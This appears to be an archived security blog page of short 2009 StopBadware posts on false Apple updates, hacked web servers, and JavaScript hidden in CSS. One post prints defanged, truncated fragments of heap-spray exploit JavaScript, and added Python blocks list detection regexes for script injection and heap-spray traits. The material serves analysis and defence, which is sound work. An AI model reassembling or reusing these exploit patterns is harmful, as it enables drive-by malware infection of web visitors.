Apple pushes false update, then backtracks

Posted by Maxim Weinstein Wed, 30 Sep 2009 16:50:32 GMT

Bloggers such as Ed Bott reported this week that Apple once again used its Apple Software Update tool to offer "updates" for software that was not installed on the user’s computer:

Under the Updates heading, Apple says I need the iPhone Configuration Utility. Oh really? Why, for heaven’s sake? I’ve never plugged an iPhone (or an iPod or any other Apple-branded hardware) into this computer. I have absolutely no need for this program. It will do nothing except take up disk space and memory and potentially represent a vector for security issues.

Ed updated the post about a day later to indicate that Apple had changed its behavior:

The iPhone configuration utility has apparently been removed from the Updates list. The contents of the New Software section are unchanged, however, with QuickTime and iTunes both being selected by default when using the Apple Software Update utility. Thanks to Gregg Keizer of Computerworld for the tip.

StopBadware readers may recall that Apple found itself on the wrong side of the community last year, when Apple Software Update started pitching Safari and iTunes as "updates" even though the apps were not installed on users’ computers. Apple changed its behavior after a community backlash that included pressure from StopBadware.org. Some felt at the time that Apple did not go far enough in changing the language of the tool, pointing out that these optional application installs were still selected by default in the update tool. However, this is the first time since then that we’ve heard about another false update. One presumes it was a mistake on Apple’s part, but even so, Apple should know better after last year’s experience.

Botweb using compromised Linux servers

Posted by Maxim Weinstein Fri, 11 Sep 2009 20:07:07 GMT

Over at the Unmask Parasites blog, periodic BadwareBusters.org contributor Denis reports on a botweb (a term coined by our own Oliver Day) that he’s been investigating:

What we see here is a long-awaited botnet of zombie web servers! A group of interconnected infected web servers with a common control center involved in malware distribution. To make things more complex, this botnet of web servers is connected with the botnet of infected home computers (the malware they serve infects computers and turns them into zombies).

The blog post contains a much more thorough analysis of the issue and is worth a read, especially if you work for a hosting provider or manage Linux-based web servers. Meanwhile, we’ve reached out to Denis to see if we can assist in notifying providers that are hosting compromised servers.

Even Linux users see effects of bad code

Posted by Maxim Weinstein Thu, 03 Sep 2009 14:42:37 GMT

Over on our community site, BadwareBusters.org, user DrHenley reports ill effects from visiting a badware site using Firefox on Ubuntu:

I could not close Firefox, and it required a reboot to stop the popups. After rebooting, the first time I ran Firefox a tab called “My Computer???” came up with the bogus antivirus supposedly scanning the C:\Windows\System folder… (in Ubuntu – ROFL), but I was able to close the tab that time, and it didn’t come back after that.

While there’s no evidence that badware penetrated beyond the browser into the OS, this user’s experience does show that the browser can be a point of vulnerability, even on Linux.

JavaScript hiding in CSS files

Posted by Oliver Day Sun, 30 Aug 2009 10:51:27 GMT

We see a lot of fun hiding spots for JavaScript at the StopBadware office as we process webmaster appeals. Last week we were reminded of something the Matasano team stated in their recent blog entry about their new testing tool: debugging tools aren’t always tuned with security people in mind.

As I was processing a website, it was pretty obvious from the flow of the requests that badware was being loaded from somewhere, and that somewhere was loading-atm net. All I had to do was track down where the call was coming from. But searching through the first two GET responses didn’t show anything making a covert or overt call to that site.

[Screenshot: hiding badware in CSS files]

One of the nice features of Burp Proxy (a web application debugging proxy) is that it filters certain responses, such as binaries, out of view. However, it also defaults to hiding CSS responses, which is unfortunately where this particular badware was hiding. It isn’t difficult to show them again (simply check CSS in the filter view).
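The lesson of the post is that a view filter is not a detection filter, so a triage pass should read every text response, stylesheets included. The following is an added example (not StopBadware's or Burp's code) that walks a constructed list of proxied responses and flags script markers inside non-HTML bodies; the URLs and domain are placeholders.

```python
import re
from urllib.parse import unquote

# Constructed sample of proxied responses as (url, content type, body); the domains are
# placeholders. The stylesheet carries a script payload that a proxy's default
# "hide CSS responses" view filter would keep out of sight.
SAMPLE_RESPONSES = [
    ("http://site.invalid/index.html", "text/html",
     "<html><head><link rel='stylesheet' href='/s.css'></head><body>hi</body></html>"),
    ("http://site.invalid/s.css", "text/css",
     "body{margin:0}\n/* */\ndocument.write(unescape('%3Cscript src=\"http://badsite.invalid/a.js\"%3E%3C/script%3E'));"),
    ("http://site.invalid/logo.png", "image/png", "\x89PNG..."),
]

# Markers that have no business in a stylesheet.
MARKER_RE = re.compile(
    r"<script\b|document\.write\s*\(|\beval\s*\(|\bunescape\s*\(|<iframe\b|String\.fromCharCode|javascript:",
    re.IGNORECASE,
)

def looks_like_css_only(body):
    """Crude structural check: a stylesheet is comments, at-rules and selector{...} blocks."""
    rest = re.sub(r"/\*.*?\*/", "", body, flags=re.S)   # comments
    rest = re.sub(r"@[a-z-]+[^;{]*;", "", rest)            # @import / @charset lines
    rest = re.sub(r"[^{}]*\{[^{}]*\}", "", rest)           # rule blocks
    return rest.strip() == ""

def find_script_in_responses(responses):
    """Return (url, label, markers) for every non-HTML text response that carries script."""
    findings = []
    for url, ctype, body in responses:
        if ctype.startswith("image/") or ctype == "application/octet-stream":
            continue
        text = unquote(body)  # undo %3Cscript%3E-style hiding before matching
        markers = sorted({m.group(0).lower() for m in MARKER_RE.finditer(text)})
        if ctype == "text/css" and (markers or not looks_like_css_only(text)):
            findings.append((url, "script-in-css", markers))
        elif markers and ctype != "text/html":
            findings.append((url, "script-in-" + ctype, markers))
    return findings
```

Feed it a proxy export or a crawl of the site's static assets; the structural check catches CSS bodies that carry foreign content even when none of the listed markers appears.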

Google Timer objects showing up in attack code

Posted by Oliver Day Sun, 30 Aug 2009 10:32:23 GMT

I have been seeing more attack JavaScript using Google timer objects. I’m not sure whether this is meant to improve the reliability of the exploit, but it is an interesting signature of the code. I’ve included a sample below (spaces added):

func tion a(){goo gle.timers.load.t.ol=(new Date).getTime();google.report&&google.report(google.timers.load,google.kCSI)}window.on load=function(){var str=[‘GIANT STRI NG OF NUMBERS’];var c=’’;for(var i=0;i

This decodes to the following (spaces added):

func tion directshow(){var shellc ode=unescape("ENCODED SHELLCODE");var bigblock=unescape("%u90 90%u9090");var headersize=20;var slackspace=headersize+shellcode.length;while(bigblock.length

Wepawet shows that this attacks a 2008 vulnerability in the Microsoft Video Controller.

VirusTotal identifies the executable as a Zbot variant.
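The timer stub, the numeric-array decoder loop and the heap-spray preamble in the decoded sample are each weak on their own but strong together. The following is an added example (not the post's own code, and not the attack code) that scores a script body against those traits; the sample is constructed in the shape of the snippet above, with the publication spaces left out, and decodes only to "Hello".

```python
import re

# Constructed sample in the shape of the snippet above (without the spaces the post
# inserted for publication): a decoder loop over a numeric array and the start of a
# heap-spray preamble. The numbers just spell "Hello"; nothing here runs.
SAMPLE_JS = """
function a(){google.timers.load.t.ol=(new Date).getTime();google.report&&google.report(google.timers.load,google.kCSI)}
window.onload=function(){var str=['72','101','108','108','111'];var c='';
for(var i=0;i<str.length;i++){c+=String.fromCharCode(str[i]);}};
function directshow(){var bigblock=unescape("%u9090%u9090");var headersize=20;
var slackspace=headersize+shellcode.length;while(bigblock.length<slackspace)bigblock+=bigblock;}
"""
BENIGN_JS = "window.onload=function(){document.getElementById('x').innerHTML='hi';};"

# (name, regex, weight): the first is the timer stub this post calls a signature,
# the rest are the decoder and heap-spray traits visible in the decoded sample.
INDICATORS = [
    ("google_timer_stub", r"google\.timers\.load", 1),
    ("numeric_array_decode", r"String\.fromCharCode\(\w+\[\w+\]\)", 2),
    ("nop_sled_unescape", r"unescape\(\"(?:%u9090)+\"\)", 3),
    ("heap_spray_vars", r"\bheadersize\b.*\bslackspace\b", 3),
]

def normalize(js):
    """Join lines and squeeze whitespace runs so the regexes see the code as one line."""
    return re.sub(r"\s+", " ", js)

def score_js(js):
    """Return (total weight, matched indicator names) for one script body."""
    text = normalize(js)
    hits = [(name, w) for name, pat, w in INDICATORS if re.search(pat, text)]
    return sum(w for _, w in hits), [name for name, _ in hits]

def is_suspicious(js, threshold=5):
    """Flag when weighted hits reach the threshold (the timer stub alone never trips it)."""
    return score_js(js)[0] >= threshold
```

Run it over the script bodies a proxy captured from a suspect page; a hit on the spray traits alone is worth a closer look even without the timer stub.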
